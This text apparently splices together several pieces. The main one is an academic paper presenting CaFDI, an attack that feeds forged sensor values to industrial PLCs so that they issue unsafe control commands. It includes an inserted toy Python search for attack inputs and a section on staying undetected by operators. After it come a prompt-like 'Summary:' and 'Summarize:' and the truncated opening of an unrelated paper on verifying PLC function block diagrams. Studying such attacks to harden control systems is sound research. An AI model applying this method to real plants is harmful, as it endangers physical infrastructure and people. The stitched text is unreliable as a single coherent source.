Arguably, the feasibility of the past false data injection attacks against power state estimation applications is limited in practice for three main reasons. First, they mostly assume complete real-time knowledge regarding the whole interconnected power system's detailed topology with potentially many power buses. Practically speaking, power system topologies change frequently as a result of real-time control actions, e.g., circuit breaker reconfigurations, and hence stealthy and malicious acquisition of real-time topological information is often hard in practice. Second, the past attacks require a large number of compromised sensors within the power grid to affect the system's observability from the power operators' viewpoint. Finally, the past attacks show how the state estimation servers could be misled; however, they completely ignore the control algorithms that use the calculated state estimates to control the underlying physical components.

We present CaFDI, a new controller-aware false data injection attack against cyber-physical platforms, specifically PLC devices. The attack eliminates the above-mentioned restrictions by targeting individual monitoring and control substations. The attack requires limited local high-level information about the substation configuration, and control over a few compromised sensors within the substation that feed data to the controlling PLC devices. The attack takes into account the controller algorithm run by the PLC to make it generate malicious control commands through manipulation of its input values.
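CaFDI's exploration of the controller model for inputs that satisfy a malicious objective can be sketched as a reachability search over a finite automaton abstraction. The state and input names below are invented, and a real Büchi automaton over infinite words (as CaFDI uses) is more involved than this toy:

```python
from collections import deque

def find_attack_inputs(transitions, start, unsafe):
    """Search a finite abstraction of a controller automaton for an
    input sequence that drives it into an unsafe state, in the spirit
    of CaFDI's model-checking step.  transitions[state][input] = next."""
    seen = {start}
    frontier = deque([(start, [])])
    while frontier:
        state, inputs = frontier.popleft()
        if state in unsafe:
            return inputs  # sensor-input sequence to inject
        for inp, nxt in transitions.get(state, {}).items():
            if nxt not in seen:
                seen.add(nxt)
                frontier.append((nxt, inputs + [inp]))
    return None  # objective unsatisfiable in this abstraction

# Hypothetical controller: 'idle' -> 'armed' -> 'overdrive' (unsafe).
auto = {"idle": {"hi": "armed", "lo": "idle"},
        "armed": {"hi": "overdrive", "lo": "idle"}}
print(find_attack_inputs(auto, "idle", {"overdrive"}))  # ['hi', 'hi']
```

If the search returns a sequence, the attacker replays those values on the compromised sensors; if it returns None, the objective is unsatisfiable under the learned abstraction.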
It is noteworthy that controller algorithm knowledge is optional for the attack, and could be provided as a high-level pseudo-code procedural description or the complete PLC instruction list program if available. The CaFDI attack consists of two main steps. First, a high-level description of the substation setting and control procedures is used to create an abstract formal finite state machine, a so-called Büchi automaton, that represents the controller code. CaFDI does not require direct access to PLC code to carry out the attack (even though direct code access would increase the attack's accuracy). If the code is available, CaFDI uses it to generate its corresponding Büchi automaton. Otherwise, CaFDI learns a high-level description of the control logic through observation of the target PLC's I/O behavior. Second, given malicious attack objectives, e.g., setting the generator set-point to infinity², CaFDI explores the generated automaton via formal model checking techniques to determine if the malicious objective is satisfiable under any circumstances, i.e., any set of input values. If satisfiable, CaFDI calculates the malicious input values and sends them to the PLC³ to make it generate malicious control outputs, e.g., order the generator to generate an infinite amount of power.

This paper presents the following contributions:
- We present a novel controller-aware false data injection attack against programmable logic controllers.
- We present a logical formalism to describe normal and unsafe cyber-physical system behavior formally.
- We have evaluated and validated the attack's feasibility on realistic cyber-physical controller programs.

2014 IEEE International Conference on Smart Grid Communications 978-1-4799-4934-2/14/$31.00 2014 IEEE 848 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:48 UTC from IEEE Xplore. Restrictions apply.

II.
PROGRAMMABLE CONTROLLERS

Programmable logic controllers (PLCs) form the border between computation and physical processes in most control systems. A PLC must not only automatically regulate a physical process, it must also provide human operators with an interface to the plant for remote operations. Despite these important responsibilities, PLCs suffer from numerous well-known security issues, and are often exposed to wide area networks. By their very architecture, PLCs have no way of defending themselves from malicious sensor or control signals, or malicious code uploading.

A. PLC Basics

PLCs fulfill a number of different responsibilities. Primarily, they perform real-time control of physical processes. This involves repeatedly reading sensor measurements from the plant, using them to calculate necessary changes, and actuating those changes with physical machinery. This three-step process is known as the scan cycle. PLCs execute scan cycles at periods ranging from one minute down to one millisecond. During each scan cycle, the PLC executes its control logic program over the sensor measurements to decide what changes to make in the plant. A secondary responsibility handled by PLCs is to act as a gateway between the plant and control room, where human operators monitor the process. In this role, the PLC aggregates process statistics for the control room, and manipulates the plant on behalf of the human operators.

The PLC's control logic is effectively a mapping from sensor inputs to outputs for plant machinery. Control logic is typically written in a graphical language such as relay ladder logic, where the program is represented as a set of concurrently executing circuits, or function block diagram, where the program is represented as a circuit containing blocks for each function applied to the input signals. Control logic often implements sequential logic, in which inputs and outputs are Boolean values.
This is commonly used for automating processes based on sequences of steps in which devices are either on or off. In addition to sequential logic, PLCs often have built-in PID (proportional-integral-derivative) controllers. PID controllers are used to hold a time-varying real-valued process at a specific set-point value. A classic example of this is the problem of balancing a ball on a stick by moving the platform beneath the stick in two dimensions.

Footnote 2: Büchi automata are discrete state-based models; however, they handle continuous dynamics too through proper atomic proposition definitions [3]. Footnote 3: Several input calculation and corruption attempts may be needed, as the automaton may not be an accurate representation of the PLC controller code, e.g., if the automaton is generated based on the high-level description.

Fig. 1. The CaFDI Threat Model.

B. PLC Security Issues Despite their critical importance in control systems, insufficient effort has been spent on securing PLCs. New vulnerabilities are increasingly being identified in PLCs and their surrounding control system equipment [4], [6], [7], [24]. In addition, PLCs are often exposed to Internet-connected corporate networks [29], and sometimes directly to the Internet [1], [11]. PLCs are often protected only by passwords, and hard-coded backdoor accounts are often added by vendors. PLCs have no access control models for manipulating physical devices, and thus any adversary that can upload code to a PLC can have complete control over the plant machinery [13]. III. OVERVIEW We describe the threat model that is required to carry out the CaFDI attack against PLC controllers, overview the attack steps, and discuss the main challenges faced by the attackers. A.
Threat Model There are several mandatory security requirements for critical power-grid infrastructures, such as the North American Electric Reliability Corporation Critical Infrastructure Protection (NERC CIP) plan [23], i.e., a set of requirements designed to secure critical power control network assets, e.g., HMI servers. For compliance, power utilities often deploy strict security measures such as restricted network access control policies. Therefore, malicious direct and/or indirect remote access to assets within the control network, and to the underlying power system components that those assets control/monitor, is often extremely hard in practice. As a case in point, it took several years and revisions even for the complicated, nation-state, targeted Stuxnet worm to reach and compromise an HMI server. However, as shown in past research on false data injection attacks [5], [9], [19], [20], [30], remote power system sensors such as phasor measurement units are less protected in practice, as they are distributed geographically across the country, and hence can be accessed and compromised more easily than the assets within the control networks. We assume that the attackers have knowledge of the high-level infrastructural configuration, i.e., the sensors/actuators connected to the PLCs' inputs/outputs. The attackers do not have to penetrate into the control network; CaFDI can still succeed even if the HMI server is not compromised and the attackers do not gain the privilege to upload a malicious controller program to the PLC device. We assume, however, that the attackers have managed to compromise the sensors that send measurements

Fig. 2. The CaFDI Overview.
Although CaFDI does not require knowledge of the detailed controller code that is running on the PLC, access to that code would help the attackers carry out the attack more effectively, i.e., succeed with a minimal number of trials. Figure 1 shows the threat model and setup for CaFDI. B. CaFDI Overview and Challenges The essence of CaFDI is to use the adversarial control over the distributed sensors to send corrupted measurements to the PLC, which is running a legitimate controller program uploaded by a non-compromised HMI server (Figure 2). The ultimate malicious objective is to exploit the controller program's logical bugs and make it output unsafe control commands to the local actuators. A trivial solution is to exhaustively try out all possible input vector values and hope that the PLC outputs unsafe control commands at some point. There are two main problems with such trial-and-error attacks. First, they do not scale up efficiently in real-world situations. For instance, every Siemens digital I/O module has 4 bytes (32 bits). Each input can be true or false, and hence the attack has to try 2^32 possible values. Second, trying out all possible values will increase the likelihood that the attack is detected, as the operators will most likely become suspicious of the underlying system's behavior. Consequently, CaFDI needs to somehow reduce its search space so that the probability of detection is minimized. To that end, there are three challenges that CaFDI needs to overcome. First, the attackers need a formalism to formulate their observation/understanding of the infrastructural behavior, i.e., the PLC's controller program logic. The formal description will help CaFDI later to skip many unnecessary input vector trials. Second, a formal description language is needed to formulate the unsafe infrastructural behavior that the attackers are looking for.
Finally, given the descriptions of the controller logic and the adversarial objectives, an efficient search engine should explore the space for promising input vector values that, if applied, will cause the system to go unsafe. IV. CONTROL LOGIC MODELING A. Controller Logic Description To formulate the controller PLC device behavior (program), the linear temporal logic (LTL) formalism [3], [25] is used. Let us define A to be a finite set of atomic logical propositions about the system {b1, b2, ..., b|A|}, e.g., "relay R1 is open", and Σ = 2^A a finite alphabet composed of the abovementioned propositions. Every element of the alphabet is a possibly empty set of propositions from A, and is denoted by ai, e.g., ai = {b1, b4, b9}. The set of linear temporal logic-based security requirements is inductively defined by the grammar

φ ::= true | b | ¬φ | φ ∨ φ | φ U φ | X φ,   (1)

where the operators represent negation (¬), logical OR (∨), temporal Until (U), and temporal Next (X). In particular, the formula a U b holds if a holds until b occurs, and the formula X a holds if a holds at the next state on the path. For example, consider a traffic light system with Boolean variables g1 and g2 that activate green lights for intersecting streets when true. According to the attacker's observation, each light goes yellow (y1 = true) before turning red (r1 = true), and both lights are never green at the same time. The system has two atomic propositions: a ≡ (g1 = true) and b ≡ (g2 = true). The global LTL system description is then stated as G[¬(a ∧ b) ∧ (g1 → X r1) ∧ (g2 → X r2)]. Following our threat model, the adversaries do not have direct access to the HMI server or PLC device, and hence cannot obtain a copy of the controller program code. Therefore, the attackers, who can observe the normal operation of the controller PLC in actual production mode, use that information to describe the deployed control logic to facilitate CaFDI's deployment.
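The Until and Next operators of grammar (1) can be illustrated with a small finite-trace evaluator. This is a simplification of our own making: full LTL is interpreted over infinite words via Büchi automata, whereas the sketch below checks a finite observed trace:

```python
# A trace is a list of states; each state is the set of atomic
# propositions (an element of the alphabet 2^A) that hold in it.

def holds_next(p, trace, i=0):
    """X p: proposition p holds in the state following position i."""
    return i + 1 < len(trace) and p in trace[i + 1]

def holds_until(p, q, trace, i=0):
    """p U q: q eventually holds, and p holds at every earlier state."""
    for j in range(i, len(trace)):
        if q in trace[j]:
            return True
        if p not in trace[j]:
            return False
    return False

# Traffic-light observation: green, then yellow, then red.
trace = [{"g1"}, {"y1"}, {"r1"}]
```

For this trace, holds_until("g1", "y1", trace) is true (green persists until yellow appears), while holds_until("g1", "r1", trace) is false, since neither g1 nor r1 holds in the middle state.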
In particular, the attackers need to assign atomic propositions to the PLC's input and output wires and describe their observed logical and temporal correlation using the LTL formalism. It is noteworthy that the formal system description is a one-time effort for adversaries without source code access, and furthermore, the description does not have to be a complete and precise representation of the controller program. Instead, a high-level (or even no) description of the logic will suffice, at the cost of more time required to find the optimal input vector for the attack (Section V). B. System Model Generation For formal attack design, i.e., to find the optimal input vector that causes the unsafe output vector, CaFDI needs to translate the control logic LTL description into a finite state machine monitor M(φ) that will be used later for adversarial exploration and input vector trials. CaFDI starts by automatically converting the control logic formula to its corresponding Büchi automaton. In particular, like in [14], CaFDI implements a recursive depth-first search algorithm to construct the corresponding generalized Büchi automaton [8], which goes through a simple degeneralization transformation [27] to yield a classical Büchi automaton. Consequently, CaFDI translates the generated Büchi automaton into a deterministic state machine using the well-known power set construction algorithm [2], [3]. Finally, to minimize the size of the generated automaton, and hence the performance overhead of the CaFDI framework on the target system, CaFDI also implements a minimization algorithm [17] to produce the automaton with a provably minimum number of states for the initial control logic formula. The generated Büchi automaton is essentially a state-based representation of the PLC's controller program that captures a superset of the program's behavioral traces.
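The determinization step can be illustrated with the classical power set (subset) construction. The sketch below is for a finite-word NFA rather than a Büchi automaton (determinizing Büchi automata proper is more involved), and all names are illustrative:

```python
from itertools import chain

def determinize(alphabet, delta, start, accepting):
    """Power set construction: each DFA state is a frozenset of NFA
    states; delta maps (nfa_state, symbol) -> set of successors."""
    start_set = frozenset([start])
    dfa_delta, seen, worklist = {}, {start_set}, [start_set]
    while worklist:
        current = worklist.pop()
        for sym in alphabet:
            nxt = frozenset(chain.from_iterable(
                delta.get((s, sym), ()) for s in current))
            dfa_delta[(current, sym)] = nxt
            if nxt not in seen:
                seen.add(nxt)
                worklist.append(nxt)
    # A subset state accepts if it contains any accepting NFA state.
    dfa_accepting = {s for s in seen if s & accepting}
    return dfa_delta, start_set, dfa_accepting

# NFA accepting strings over {0,1} that end in 1.
delta = {("q0", "0"): {"q0"}, ("q0", "1"): {"q0", "q1"}}
d, s0, acc = determinize({"0", "1"}, delta, "q0", {"q1"})
```

Running the resulting DFA on "011" ends in an accepting subset containing q1. In CaFDI's pipeline, the determinized and minimized automaton still captures a superset of the concrete program's behavioral traces.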
This over-approximation arises because the attacker, who initially describes the controller using the LTL formalism, does not necessarily have source code access and hence may not be aware of all logical control flow details of the running program. V. ADVERSARIAL EXPLORATION Given the controller's behavioral model, the attacker specifies an unsafe system state as the target state; CaFDI then finds the optimal input vector to drive the system towards the determined unsafe state. A. Formal Attack Description To design an attack, CaFDI needs to know its ultimate objective, which is often a particular damaging incident, such as a critical transmission line outage or a power generator blow-up as a result of high generation set points. Formally, each of these incidents is represented mathematically as one or more states in the generated controller behavioral model (Büchi automaton). In CaFDI, the attacker describes the target damaging incident using simple propositions, e.g., "Relay R1 is open" or "Generation set point on the generator G2 > 3000 MW". It is noteworthy that CaFDI also supports more complex adversarial state descriptions using LTL temporal operators; however, this requires more advanced power system and computer logic knowledge (footnote 4). CaFDI converts the target unsafe state description to its corresponding Büchi automaton as discussed in Section IV-B. The generated automaton represents all possible states in which the system would be operating unsafely, and will be used later to design the attack, i.e., calculate the optimal malicious PLC input vector. B. System-based Attack Design CaFDI's ultimate goal is to come up with a set of suitable input vectors for the attackers to make the compromised sensors send to the PLC.
To this end, CaFDI makes use of the two generated Büchi automata: the controller behavioral model Bc and the unsafe target state description Bu. CaFDI creates a state-based Cartesian product model of the two graph models Bc and Bu, i.e., P(Bc, Bu), where each state has two sub-states referring to the corresponding Bc and Bu states. Consequently, CaFDI starts from the initial state of P and explores the state space recursively for an accepting path that, if found, proves that the PLC program model Bc may produce an execution trace in which Bu is satisfied, i.e., the system enters its unsafe state. If any accepting path is detected, it is considered an attack path and its corresponding input vector values are stored in a table T; otherwise, the controller is secure and cannot enter an unsafe state under any circumstances. Consequently, the table T contains all input vectors that cover all possible attack paths in P. C. Stealthy Attack CaFDI's final step is to make the sensors send corrupted data, i.e., the calculated input vectors in T, to the PLC controller. However, some of the input vectors may not result in an unsafe system state, because the initial controller behavioral description by the attacker is often not absolutely precise. Therefore, the T entries should be tried out one at a time until the unsafe system state occurs. Given that the initial controller behavioral description is correct (even if not accurate; footnote 5), such an iterative input vector retrial procedure is guaranteed to realize an unsafe system state if there is any. However, the optimal adversarial procedure would be to remain stealthy during

Footnote 4: To provide a more user/attacker-friendly interface, there are several solutions that translate high-level and simple-to-understand descriptions, e.g., English sentences, to low-level formal LTL formulas. This is outside the scope of this paper, and the interested reader is referred to [15].
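The product construction and accepting-path search of Section V-B can be sketched over explicit, finite transition systems. These are toy automata and names of our own making, not the paper's implementation; real Büchi acceptance also requires a reachable accepting cycle, which the plain reachability check below abstracts away:

```python
from collections import deque

def find_attack_path(trans_c, trans_u, init_c, init_u, accepting_u):
    """Breadth-first search over the Cartesian product of the controller
    model B_c and the unsafe-state monitor B_u.  Each trans_* maps a
    state to a list of (input, successor) pairs; returns the input
    sequence reaching an accepting product state, or None."""
    start = (init_c, init_u)
    queue, seen = deque([(start, [])]), {start}
    while queue:
        (sc, su), path = queue.popleft()
        if su in accepting_u:
            return path                      # an attack path for table T
        for inp, sc2 in trans_c.get(sc, []):
            for inp2, su2 in trans_u.get(su, []):
                if inp == inp2 and (sc2, su2) not in seen:
                    seen.add((sc2, su2))
                    queue.append(((sc2, su2), path + [inp]))
    return None                              # controller cannot go unsafe

# Toy controller: the actuator turns "on" exactly when the input is 1.
trans_c = {"off": [(0, "off"), (1, "on")], "on": [(0, "off"), (1, "on")]}
# Unsafe monitor: accepting once the actuator has ever been driven on.
trans_u = {"u0": [(0, "u0"), (1, "u1")], "u1": [(0, "u1"), (1, "u1")]}
attack = find_attack_path(trans_c, trans_u, "off", "u0", {"u1"})  # [1]
```

Here the search immediately yields the single corrupted input 1 as the attack path.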
Footnote 5: We call the description correct if the controller program complies with the specification completely. The description is called accurate if it captures every aspect of the controller program.

Fig. 3. The Automatically Generated Automata for CaFDI: (a) System Description; (b) Unsafe State; (c) Product Automaton; (d) Simplified Product Automaton.

the trial iterations, and hence to try out the stealthier input vectors first, leaving the more noticeable ones for later if the stealthier vectors do not realize the unsafe system state. As a clarifying example, a Boolean input with an LED indicator could be considered a noticeable input (by the operator), and is preferably kept unchanged to maintain the attack's undetectability. To this end, CaFDI requires the attacker to rank the input wires in terms of their degree of noticeability. Consequently, CaFDI obtains the input vector's current legitimate value and ranks the input vectors within T accordingly, such that the more noticeable inputs within the top-ranked vectors keep the same value as their corresponding legitimate values, and hence trigger the minimum level of suspicion. VI. EVALUATIONS A. Control System Case Study PLCs are a critical component of many control systems, including power generation and distribution. To make sure that CaFDI can be used for practical safety verification of real-world infrastructures, we deployed CaFDI on a PLC controller program on an industrial control system. Assembly way: items
The following shows a snippet of thecore part of the controller program that the attacker doesnot have access to. Brie y, after the variable declaration, the controller moves down the arm, i.e., the output variable Q0.0 once the sensor detects the object on the belt, i.e., the inputvariable I0.0. BEGIN NETWORK 1 A I 0.0; L S5T#5S; SP T 1; NOP 0; LT 1 ;T MW 10; NOP 0; AT 1 ; = Q 0.0; ... We played as an attacker and, before looking at the code above, described the PLC behavior by observing the TrySim 3D simulator6running the code on a sim- ulated environment. We speci ed the behavior as c= G(!Linear-Mover ULight-Barrier-Sensor ), i.e., the arm stays off until the light sensor detects an object. CaFDI generatedthe corresponding automaton automatically (see Figure 3(a)).Additionally, we described the unsafe state simply as u= Linear-Mover, to control the arm whenever desired such aswhile the belt is moving and moving objects are not in suitablepositions. Figure 3(b) shows the generated B uchi automaton that describes the adversarial LTL formula. Consequently,CaFDI generates the product model Pusing the two generated automata B cand Bu(see Figure 3(c)). Finally, CaFDI simpli es the generated product automaton using a reachability analysis from its initial state. Figure 3(d) shows the re ned model thatCaFDI uses to search for adversarial input vectors, i.e., thelight barrier sensor value in this case. The search immediatelyresults in the value 1 for the light barrier sensor. CaFDI thensends corrupted sensor value 1 that leads to malicious armmotion at attacker s will. B. Scalability Furthermore, for a generic evaluation of the automata size range that CaFDI has to process in real-world settings, we mea-sured the size of generated automata for typical and frequently used linear temporal logic-based system speci cation formula 7 introduced in [10]. The state space sizes of the generated automata are all below 35 states (see Figure 4(a)). 
CaFDI completed the LTL-to-Büchi conversion for individual temporal requirements in approximately 0.58 seconds on average (see Figure 4(b)), which is a reasonable time requirement for real-world settings.

Footnote 6: Available at http://www.trysim.de. Footnote 7: http://patterns.projects.cis.ksu.edu/documentation/patterns/ltl.shtml

VII. RELATED WORK False data injection attacks. There have been several recent related projects that focus on false data injection attacks [5], [19], [20] on state estimation. The objective is for an adversary to modify multiple measurements in a coordinated manner to influence the estimate of the state. The attack needs to remain undetected by traditional bad-data detection schemes. Consequently, several countermeasures against such attacks have been proposed (e.g., [5], [9], [19]). The impact of such false data injections on power system operations can be remarkable [18], [26], [28]. Specifically, [18], [28] show that false data injection attacks can be used to manipulate real-time prices in electricity markets, while [26] shows that they can cause operators to make suboptimal power dispatch decisions. Countermeasures against FDI intrusions. Kosut et al. [19] introduce a mathematical procedure to localize false data injection intrusions via the generalized likelihood ratio test. Zonouz et al. [30] propose SCPSE, a cyber-physical state estimation algorithm that considers sensor data from both power sensors and cyber intrusion detection systems to calculate an accurate estimate of the system state. Bobba et al. [5] and Dan et al. [9] investigate how knowledge about power system topology and inter-sensor data correlations can be leveraged to detect malicious false data injection, and provide insight into the nature of unobservable attacks. Giani et al. [16] provide further characterization of unobservable attacks.
However, unlike CaFDI, those efforts only leverage power system measurements, except for [9], which leverages communication infrastructure topology information as well. VIII. DISCUSSIONS A. Real-World Feasibility The feasibility of the attack depends on several factors: the attacker's degree of knowledge about the target facility and the physical vulnerability of the sensors in the target facility. Compared to the existing false data injection attacks on state estimators, the demonstrated controller-targeted attacks require less knowledge about the system. As shown, exact knowledge of the PLC's control program is not needed for controller-aware attacks. State estimation attacks, on the other hand, assume the attacker has exact knowledge of the whole target interconnected power system's topology (typically encoded as an observation matrix), as well as the full control algorithm. Furthermore, state estimation attacks require control of a significant percentage of sensors. As demonstrated, for controller-aware attacks, control of a single sensor may be sufficient to achieve the desired effect on a victim control system. A general question regarding feasibility is how confident an attacker can be in the attack's outcome. In state estimation attacks on very large systems, the adversary cannot make any statement about what effect the attack will have on the physical system. In this case, the adversary can only be confident that the injected sensor measurements will slip by the bad-data detector. In state estimation attacks against closed-loop control systems where the control algorithm is known, the adversary can push the victim control system arbitrarily far from its desired operating state, assuming it has an unstable eigenvalue [22]. The confidence level in controller-aware attacks, on the other hand, can be determined a priori based on the size of the product Büchi automaton (Section V-B). B.
Potential Mitigation Techniques The most straightforward mitigation technique against any false data injection attack is to secure the sensors and the data channels between the sensors and the PLC. For physically distributed systems, absolute sensor hardening is not feasible, because the sensors are often deployed in remote locations, and physical manipulations without compromising the sensors may suffice to report a desired sensor reading to the control network.

Fig. 4. CaFDI Scalability Results: (a) Automata for Frequently Used Specifications (total number of automaton states for typical temporal security specification patterns); (b) Automaton Generation Time Requirement.

Physical tamper detection, e.g., similar to the tilt sensors used in distribution smart meters, would be effective in detecting sensor manipulation. Similarly, redundant sensor deployment would increase the burden on the adversary, but would be costly. A more effective defense would be to formally verify that PLC control programs will not cause undesired plant behavior given any input vector [21]. Thus, regardless of the attacker's capability to compromise sensors and knowledge of the plant, malicious behavior will be prevented. This is clearly a challenging endeavor, as it requires an explicit statement of all undesired behavior; i.e., the adversary needs to design only one attack (malicious output values) that the controller program verifier does not check for. IX.
CONCLUSIONS We presented CaFDI, a controller-aware false data injection attack against cyber-physical industrial control networks in which PLC devices are used to automate the control of physical equipment based on input sensor measurements. CaFDI creates a formal model of the PLC code and makes use of model checking techniques to explore the created model to determine, and later feed, input values that make the PLC generate malicious control commands. Our empirical evaluations prove CaFDI's feasibility on real-world PLC controller programs.

REFERENCES
[1] Shodan. http://www.shodanhq.net.
[2] A. Bauer, M. Leucker, and C. Schallhart. Comparing LTL semantics for runtime verification. J. Log. and Comput., 20(3):651-674, June 2010.
[3] A. Bauer, M. Leucker, and C. Schallhart. Runtime Verification for LTL and TLTL. ACM Transactions on Software Engineering and Methodology, 20(4):14:1-14:64, 2011.
[4] D. Beresford. Exploiting Siemens Simatic S7 PLCs. In Black Hat USA, 2011.
[5] R. B. Bobba, K. M. Rogers, Q. Wang, H. Khurana, K. Nahrstedt, and T. J. Overbye. Detecting false data injection attacks on DC state estimation. In Workshop on Secure Control Systems, Apr. 2010.
[6] Computer Emergency Response Team. ADVANTECH/BROADWIN WEBACCESS RPC VULNERABILITY. ICS-CERT Advisory 11-094-02, April 2011.
[7] L. Constantin. Researchers Expose Flaws in Popular Industrial Control Systems. http://www.pcworld.com, January 2012.
[8] C. Courcoubetis, M. Vardi, P. Wolper, and M. Yannakakis. Memory-efficient algorithms for the verification of temporal properties. Form. Methods Syst. Des., 1(2-3):275-288, Oct. 1992.
[9] G. Dan and H. Sandberg. Stealth attacks and protection schemes for state estimators in power systems. In Proc. of IEEE SmartGridComm, 2010.
[10] M. B. Dwyer, G. S. Avrunin, and J. C. Corbett. Patterns in property specifications for finite-state verification.
In Proceedings of the 21st International Conference on Software Engineering, ICSE '99, pages 411-420, 1999.
[11] Eireann P. Leverett. Quantitatively Assessing and Visualising Industrial System Attack Surfaces. Master's thesis, University of Cambridge, 2011.
[12] N. Falliere, L. O. Murchu, and E. Chien. W32.Stuxnet Dossier. Technical report, Symantec Security Response, Oct. 2010.
[13] N. Falliere, L. O. Murchu, and E. Chien. W32.Stuxnet Dossier. http://www.symantec.com/connect/blogs/w32stuxnet-dossier, 2010.
[14] R. Gerth, D. Peled, M. Y. Vardi, and P. Wolper. Simple on-the-fly automatic verification of linear temporal logic. In Proceedings of the Fifteenth IFIP WG6.1 International Symposium on Protocol Specification, Testing and Verification XV, pages 3-18, London, UK, 1996. Chapman & Hall, Ltd.
[15] S. Ghosh, D. Elenius, W. Li, P. Lincoln, N. Shankar, and W. Steiner. Automatically extracting requirements specifications from natural language. arXiv preprint arXiv:1403.3142, 2014.
[16] A. Giani, E. Bitar, M. Garcia, M. McQueen, P. Khargonekar, and K. Poolla. Smart grid data integrity attacks: characterizations and countermeasures. In IEEE International Conference on Smart Grid Communications, pages 232-237, 2011.
[17] J. E. Hopcroft. An n log n algorithm for minimizing states in a finite automaton. Technical report, Stanford, CA, USA, 1971.
[18] L. Jia, R. J. Thomas, and L. Tong. Impacts of malicious data on real-time price of electricity market operations. In HICSS, pages 1907-1914, 2012.
[19] O. Kosut, L. Jia, R. J. Thomas, and L. Tong. Malicious data attacks on smart grid state estimation: Attack strategies and countermeasures. In IEEE International Conference on Smart Grid Communications, pages 220-225, 2010.
[20] Y. Liu, P. Ning, and M. K. Reiter. False data injection attacks against state estimation in electric power grids. ACM Trans. Inf. Syst. Secur., 14:13:1-13:33, 2011.
[21] S. McLaughlin, S. Zonouz, D. Pohly, and P. McDaniel.
A trusted safety verifier for process controller code. In Proceedings of the ISOC Network and Distributed Systems Security Symposium (NDSS), 2014.
[22] Y. Mo and B. Sinopoli. False data injection attacks in control systems. In Proceedings of the First Workshop on Secure Control Systems (SCS), 2010.
[23] NERC. Standards as approved by the NERC Board of Trustees, May 2006.
[24] D. G. Peterson. Project Basecamp at S4. http://www.digitalbond.com/2012/01/19/project-basecamp-at-s4/, January 2012.
[25] A. Pnueli. The Temporal Logic of Programs. In Proceedings of the 18th Annual Symposium on Foundations of Computer Science, pages 46-57. IEEE Computer Society, 1977.
[26] A. Teixeira, H. Sandberg, G. Dan, and K.-H. Johansson. Optimal power flow: Closing the loop over corrupted data. In Proc. of American Control Conference, 2012.
[27] M. Y. Vardi. An automata-theoretic approach to linear temporal logic. In Proceedings of the VIII Banff Higher Order Workshop Conference on Logics for Concurrency: Structure versus Automata, pages 238-266, Secaucus, NJ, USA, 1996. Springer-Verlag New York, Inc.
[28] L. Xie, Y. Mo, and B. Sinopoli. Integrity data attacks in power market operations. IEEE Trans. Smart Grid, 2(4):659-666, 2011.
[29] T. Yardley. SCADA: Issues, Vulnerabilities, and Future Directions. ;login:, 34(6):14-20, December 2008.
[30] S. Zonouz, K. Rogers, R. Berthier, R. Bobba, W. Sanders, and T. Overbye. SCPSE: Security-oriented cyber-physical state estimation for power grid critical infrastructures. IEEE Transactions on Smart Grid, 3(4):1790-1799, 2012.
Summary:
Control systems rely on accurate sensor measurements to safely regulate physical processes. In False Data Injection (FDI) attacks, adversaries inject forged sensor measurements into a control system in hopes of misguiding control algorithms into taking dangerous actions. Traditional FDI attacks mostly require adversaries to know the full system topology, i.e., hundreds or thousands of lines and buses, while having unpredictable consequences. In this paper, we present a new class of FDI attacks directed against individual Programmable Logic Controllers (PLCs), which are ubiquitous in power generation and distribution. Our attack allows the adversary to have only partial information about the victim subsystem, and produces a predictable malicious result. Our attack tool analyzes an I/O trace of the compromised PLCs to produce a set of inputs that achieve the desired PLC outputs, i.e., the desired system behavior. It proceeds in two steps. First, our tool constructs a model of the PLC's internal logic from the I/O traces. Second, it searches for a set of inputs that cause the model to produce the desired malicious behavior. We evaluate our tool against a set of representative control systems and show that it is a practical threat against insecure sensor configurations.
Summarize:
Keywords: formal verification; model checking; PLC; FBD; IEC 61131-3. I. INTRODUCTION Programmable Logic Controllers (PLCs) are a special type of computer used in automation systems [1]. Generally speaking, they are based on sensors and actuators and have the ability to control, monitor and interact with a particular process or a collection of processes. These processes are diverse and can be found, for example, in household appliances, emergency shutdown systems for nuclear power stations, chemical process control and rail automation systems. IEC is an organization that provides international standards for electrical, electronic and related technologies. The standard IEC 61131-3 [2] describes, inter alia, PLC programming languages. There are five PLC languages proposed in the standard. Two of them are textual languages: (a) IL - Instruction List, and (b) ST - Structured Text. The other three are graphical languages: (c) FBD - Function Block Diagram, (d) LD - Ladder Diagram and (e) SFC - Sequential Function Chart. In this paper, the application and verification of PLCs in the rail automation domain is considered. One area of applying PLCs in this domain is electronic interlocking systems based on PLCs. Generally, electronic interlockings are used to control signals, points, line crossovers and level crossings, thereby ensuring safe operation. Most of the interlocking software has been written in the graphical language FBD. The goal of our work is to investigate the verification of FBDs. In the past years, there has been increasing interest in analyzing PLC applications with formal methods. The low-level language IL has been the most investigated language in terms of PLC verification. Hence, first attempts to verify FBDs were made by verifying the IL representation of an FBD program. Let us briefly describe some of the approaches for IL verification. In [3], timed automata are used to model IL programs.
For verification, the model checker UPPAAL is used. Function and function block calls are not implemented. [4] proposes Petri nets and SMV for model checking IL programs. As data structures, anything can be used that can be coded with 8 bits. Another method that proposes verification with SMV is sketched in [5]. Time and timers are not part of the model in this work. Comparing the existing IL verification techniques and analyzing the properties of the software to be verified, we took the latter method as a starting point. The theory behind our improvement of the technique was described in [6]. The tool that automates the process was published in [7]. This way, we managed to make the model checking of the IL format of interlocking software fully automatic. The goal of [6] and [7] was to apply another method to the interlocking software described in this work. Unfortunately, the models became so complex that only small parts of the software could be verified. In the second phase of the project, in order to verify existing industrial software and not just parts of it, the verification of FBD programs has been suggested. The main idea of the technique can be found in [8]. In this paper, we formalize and automate this method. In the last years, other work on FBD verification has been published ([9] and [10]). These papers do not offer enough detail to enable a comparison with our work. The paper is organized as follows. Section 2 briefly reviews the PLC structure and PLC programming languages. The theoretical background of the method for FBD verification is described in Section 3. There we introduce the textual representation of FBD.
Section 4 contains a case study which illustrates the application area for the work presented here. The automation of the verification method is described in Section 5. Finally, the last section draws conclusions and indicates plans for future work.

2010 Third International Conference on Software Testing, Verification and Validation. 978-0-7695-3990-4/10 $26.00 2010 IEEE. DOI 10.1109/ICST.2010.10439. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply.

[Figure 1. PLC organization: input module, CPU, output module]

II. PROGRAMMABLE LOGIC CONTROLLERS

As already mentioned, PLCs are a special type of computer based on sensors and actuators, able to control, monitor and influence a particular process. In this section, the PLC structure and programming languages are described.

A. PLC Structure

